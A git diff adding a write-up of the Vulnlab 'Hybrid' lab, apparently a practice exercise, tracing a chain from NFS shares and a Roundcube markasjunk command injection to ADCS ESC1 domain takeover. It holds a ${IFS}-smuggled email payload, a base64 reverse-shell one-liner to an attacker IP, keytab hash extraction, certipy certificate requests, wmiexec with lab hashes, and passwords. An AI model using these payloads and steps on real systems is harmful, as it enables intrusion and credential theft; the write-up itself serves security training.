diff --git a/Vulnlab/Hybrid.md b/Vulnlab/Hybrid.md new file mode 100644 index 0000000..07889d6 --- /dev/null +++ b/Vulnlab/Hybrid.md @@ -0,0 +1,342 @@ + +# Vulnlab - Hybrid + +# dc01 + +## NMAP + +```bash +Nmap scan report for 10.10.177.197 +Host is up (1.1s latency). +Not shown: 65523 filtered tcp ports (no-response) +PORT STATE SERVICE VERSION +53/tcp open tcpwrapped +135/tcp open tcpwrapped +139/tcp open tcpwrapped +445/tcp open tcpwrapped +464/tcp open tcpwrapped +3268/tcp open tcpwrapped +3389/tcp open tcpwrapped +|_ssl-date: 2023-07-09T15:21:51+00:00; -3s from scanner time. +| ssl-cert: Subject: commonName=dc01.hybrid.vl +| Issuer: commonName=dc01.hybrid.vl +| Public Key type: rsa +| Public Key bits: 2048 +| Signature Algorithm: sha256WithRSAEncryption +| Not valid before: 2023-06-17T08:29:18 +| Not valid after: 2023-12-17T08:29:18 +| MD5: 503e6a310914a23a96f899c161496768 +|_SHA-1: 8b350872418cb813302ad430acb1b1497acada2e +49669/tcp open tcpwrapped +51915/tcp open tcpwrapped +51928/tcp open tcpwrapped +53128/tcp open tcpwrapped +57220/tcp open tcpwrapped +Host script results: +|_clock-skew: mean: -3s, deviation: 0s, median: -3s +| smb2-time: +| date: 2023-07-09T15:21:28 +|_ start_date: N/A +| smb2-security-mode: +| 311: +|_ Message signing enabled and required + +``` + +## PORT 445 (SMB) + +From dc01, we only see smb service running which we can try enumerating with anonymous login which didn't worked + + + +# mail01 + +## NMAP + +```bash +Nmap scan report for 10.10.177.198 +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 256 60bc2226783cb4e06beaaa1ec1625dde (ECDSA) +|_ 256 a3b5d86106e63a418845e35203d2231b (ED25519) +25/tcp open smtp Postfix smtpd +|_smtp-commands: Couldn't establish connection on port 25 +80/tcp open http nginx 1.18.0 (Ubuntu) +|_http-server-header: nginx/1.18.0 (Ubuntu) +110/tcp open pop3 Dovecot pop3d +111/tcp open rpcbind +143/tcp open imap Dovecot imapd (Ubuntu) +587/tcp open smtp Postfix smtpd +|_smtp-commands: Couldn't establish connection on port 587 +993/tcp open ssl/imap Dovecot imapd (Ubuntu) +| ssl-cert: Subject: commonName=mail01 +| Subject Alternative Name: DNS:mail01 +| Issuer: commonName=mail01 +| Public Key type: rsa +| Public Key bits: 2048 +| Signature Algorithm: sha256WithRSAEncryption +| Not valid before: 2023-06-17T13:20:17 +| Not valid after: 2033-06-14T13:20:17 +| MD5: 38372b812fb16f03436025b4d26bdb29 +|_SHA-1: 61c2400271ff7850e0da4a5ae256e7df666bb008 +995/tcp open ssl/pop3 Dovecot pop3d +| ssl-cert: Subject: commonName=mail01 +| Subject Alternative Name: DNS:mail01 +| Issuer: commonName=mail01 +| Public Key type: rsa +| Public Key bits: 2048 +| Signature Algorithm: sha256WithRSAEncryption +| Not valid before: 2023-06-17T13:20:17 +| Not valid after: 2033-06-14T13:20:17 +| MD5: 38372b812fb16f03436025b4d26bdb29 +|_SHA-1: 61c2400271ff7850e0da4a5ae256e7df666bb008 +2049/tcp open rpcbind +33893/tcp open rpcbind +37693/tcp open rpcbind +42661/tcp open rpcbind +46025/tcp open rpcbind +47609/tcp open rpcbind +``` + +## PORT 80 (HTTP) + +mail01 had web server running on port 80 which redirects to `mail01.hybrid.vl` + + + +Adding the domain in `/etc/hosts` file + + + + + +This brings us to `Roudcube webmail` login portal, trying default credentials like `admin:admin` it didn't worked + + + +## PORT 2049 (NFS) + +mail01 had nfs running on port 2049, we can list the share available to mount + +```bash +showmount -e 10.10.177.198 +``` + + + +We can mount this share with the following command + +```bash + mount -t nfs 10.10.177.198:/opt/share /home/arz/VulnLab/Hybrid/share +``` + + + +From this directory we can find `backup.tar.gz` + + + +Extracting the archive + + + +From the `opt` folder we can find a certificate + + + +And from `/etc/dovecot` we can find the credentials for roundcube mail + + + +Logging in as `peter.turner` we can see an email sent from admin talking about spam filter + + + +https://ssd-disclosure.com/ssd-advisory-roundcube-markasjunk-rce/ + +## Foothold + +Following an article for remote code execution on markasjunk plugin we can execute commands by changing the email address of a user by using `${IFS}` which is a variable in bash that represents a space, tab and a new line character + +``` +admin&curl${IFS}10.8.0.136&@hybrid.vl +``` + + + +Now mark any email as junk + + + +We'll get a callback on our listener, so the commands are getting executed + + + +We can get a reverse shell by base64 encoding the payload + +```bash +bash -i >& /dev/tcp/10.8.0.136/2222 0>&1 + +admin&echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMTM2LzIyMjIgMD4mMQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl +``` + + + +On doing the same procedure, we'll get a reverse shell as `www-data` + + + +In `/home` we only see one user which is a domain user, `peter.turner`, I tried switching to peter by using his roudcube password but it didn't worked + + + +I tried cracking the password of `privkey.pem` but it took a long time so I decided to give up on that + + + +Reading `/etc/exports` file, we can see there's no `no_root_squash` so we cannot place bash binary owned by root user + + + +We know there's peter.turner on the victim machine with the id `902601108` + + + +Before creating the user with the same uid on our machine we meed to allow the creation of uids above 60000 range + + + +Edit the `/etc/logins.defs` and change the `UID_MAX` value + + + + + +Now copying bash binary in the mounted folder + + + +We can see that this binary is owned by peter.turner since we used the same UID and it's a SUID, but on executing it wasn't being executed due to a different GLIBC version, so instead transferring the bash binary from the victim machine and making it a SUID + + + + + +From peter's home directory, we can find `passwords.kdbx` file which is a keepassp password safe file + + + + +Reading the kdbx file with `kpcli` , it asks for a password + + + +Using peter's roudcube password it worked on this file + + + +From `hybrid.vl` entry we can get the password of peter + + +We can use this password to check privileges of peter, which can run anything as root + + + + + +Being root user we can access `/etc/k` + +Running `python-bloodhound` to enumerate the trusted.vl domain + +```bash +python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'hybrid.vl' -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -gc 'dc01.hybrid.vl' -ns 10.10.132.229 +``` + + + +From bloodhound, there wasn't any path from peter leading to domain admin + + + +Enumerating ADCS with `certipy` for vulnerable certificates + +```bash +certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.228.165 +``` + + + +Members of `Authenticated users` can enroll and authenticate any user with `hybrid-DC01-CA` (ESC-1), using `old-bloodhound` to get the result in json file so we can view it in bloodhound + +```bash +certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.147.37 -old-bloodhound +``` + + + +https://raw.githubusercontent.com/ly4k/Certipy/main/customqueries.json + + Make sure to add custom queries for ADCS in `~./config/bloodhound/customqueries.json` to analyze ADCS in the domain + + + +After putting the custom queries we can see the templates being reflected on bloodhound + + + +Marking `hybrid-DC01-CA` as the high value target and checking the shortest path to hybrid-DC01-CA + + + +So now we need MAIL01's hash, going back to linux machine as root user, we can extract the NTHash using https://github.com/sosdave/KeyTabExtract from `/etc/krb5.keytab` + + + + + +From certipy we didn't found any template names, from bloodhound we can see two templates from which using `HYBRIDCOMPUTERS` + + + +On requesting the certificate, it was giving an error related to public key requirement + + + +Checking the pem file we have, we can see the size of the public key, which is 4096 bit + + + +Specifying the size of the public key file and requesting the certificate to authenticate as administrator + +```bash +certipy req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.228.165" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'dc01.hybrid.vl' -key-size 4096 +``` + + + +Now again with `certipy` we can request administrator's NTHash + +```bash +certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.228.165 +``` + + + +We can get a shell through `wmiexec` + +```bash +wmiexec.py administrator@10.10.228.165 -hashes ':60701e8543c9f6db1a2af3217386d3dc' +``` + + + + +## References + +- https://ssd-disclosure.com/ssd-advisory-roundcube-markasjunk-rce/ +- https://github.com/ly4k/Certipy/blob/main/customqueries.json +- https://github.com/sosdave/KeyTabExtract +- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation +- https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration +